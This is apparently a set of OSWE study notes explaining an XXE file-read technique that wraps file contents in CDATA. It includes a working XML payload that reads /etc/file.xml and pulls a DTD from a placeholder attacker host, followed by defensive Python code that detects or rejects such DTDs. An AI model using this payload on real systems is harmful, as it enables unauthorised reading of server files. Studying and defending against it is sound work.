OSWE Everything

Wrappers for errors

Escaping characters

Getting parse errors while reading XML files from the server?

Wrap the output in a CDATA section. The parser then treats the file contents as literal character data, so characters such as "<", ">" and "&" in the file no longer need escaping and no longer break the document.

Wrap the file contents between these tags: "<![CDATA[" output "]]>"

It is worth mentioning that, inside the internal DTD subset, one entity cannot be built from other entities: parameter-entity references are not allowed within markup declarations there, so a declaration like <!ENTITY wrapper "%start;%file;%end;"> would be rejected. That is why the wrapper entity that joins the parameter entities is declared in an external DTD file.

Wrapper

Host this file (wrapper.dtd) on your own file server so the application can fetch it:

<!ENTITY wrapper "%start;%file;%end;">

The payload sent to the vulnerable part of the application:

<?xml version="1.0"?>
<!DOCTYPE data [
<!-- Create the entities -->
<!ENTITY % start "<![CDATA[">
<!ENTITY % file SYSTEM "file:///etc/file.xml" >
<!ENTITY % end "]]>">

<!-- Load the external DTD, which assembles the entities and
     returns the file contents wrapped in CDATA -->
<!ENTITY % dtd SYSTEM "http://<ATTACKER_IP>/wrapper.dtd" >
%dtd;
]>

In the body of the request, reference &wrapper; where the file contents should appear; the parser expands it through the external DTD loaded by %dtd;.

That was the process of wrapping the XML file contents into CDATA in order to avoid character escaping and errors during payload execution.

Now we can read whatever file we want, even if it has characters like "<" or ">".
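A defender-side counterpart to the payload above, added here as an example and not part of the original page: with Python's stdlib expat parser, parameter-entity expansion is left disabled so the external wrapper.dtd is never fetched, while the declarations that set it up are still reported for logging, and a stricter parser rejects any DOCTYPE outright. The DTD hostname and the sample documents are constructed placeholders.

```python
# Defensive triage of the CDATA-wrapper XXE payload using only the stdlib expat parser.
# Parameter-entity expansion stays off, so wrapper.dtd is never fetched, yet the
# declarations that set up the attack remain visible to a detection rule.
from xml.parsers import expat

# Constructed sample mirroring the page's payload; the DTD host is a placeholder.
XXE_PAYLOAD = b"""<?xml version="1.0"?>
<!DOCTYPE data [
<!ENTITY % start "<![CDATA[">
<!ENTITY % file SYSTEM "file:///etc/file.xml" >
<!ENTITY % end "]]>">
<!ENTITY % dtd SYSTEM "http://dtd-host.invalid/wrapper.dtd" >
%dtd;
]>
<data>&wrapper;</data>"""
BENIGN = b'<?xml version="1.0"?><data>hello &amp; welcome</data>'

class DoctypeRejected(ValueError):
    """Raised by safe_parse() the moment a DTD appears."""

def inspect_dtd(xml_bytes):
    """Report which DTD features a document uses, for logging or a WAF-style rule."""
    findings = {"doctype": False, "param_entities": [], "external_entities": []}
    p = expat.ParserCreate()
    # NEVER is expat's default; set it explicitly so %dtd; is never resolved.
    p.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)
    def on_doctype(name, sysid, pubid, has_internal_subset):
        findings["doctype"] = True
    def on_entity(name, is_param, value, base, sysid, pubid, notation):
        if is_param:
            findings["param_entities"].append(name)
        if sysid is not None:  # SYSTEM "..." means the parser would read a file or URL
            findings["external_entities"].append((name, sysid))
    p.StartDoctypeDeclHandler = on_doctype
    p.EntityDeclHandler = on_entity
    p.ExternalEntityRefHandler = lambda *args: 0  # refuse external general entities too
    p.Parse(xml_bytes, True)
    return findings

def safe_parse(xml_bytes):
    """Parse untrusted XML for the application: any DOCTYPE is rejected outright."""
    text = []
    p = expat.ParserCreate()
    p.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)
    def on_doctype(name, sysid, pubid, has_internal_subset):
        raise DoctypeRejected(f"DOCTYPE {name!r} is not allowed on this endpoint")
    p.StartDoctypeDeclHandler = on_doctype
    p.CharacterDataHandler = text.append
    p.Parse(xml_bytes, True)
    return "".join(text)
```

Running inspect_dtd on the sample payload lists the three CDATA-wrapper parameter entities plus the two SYSTEM identifiers, which is exactly the pattern worth alerting on; safe_parse never gets that far because it stops at the DOCTYPE.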


Last updated 1 month ago